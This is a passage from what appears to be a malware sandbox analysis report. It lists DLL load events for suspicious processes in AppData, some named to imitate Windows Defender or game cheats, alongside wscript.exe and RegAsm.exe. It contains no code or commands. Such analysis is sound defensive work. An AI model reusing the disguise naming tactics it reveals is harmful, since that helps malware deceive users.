                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: taskschd.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: sxs.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: ktmw32.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: dlnashext.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: wpdshext.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeSection loaded: urlmon.dll
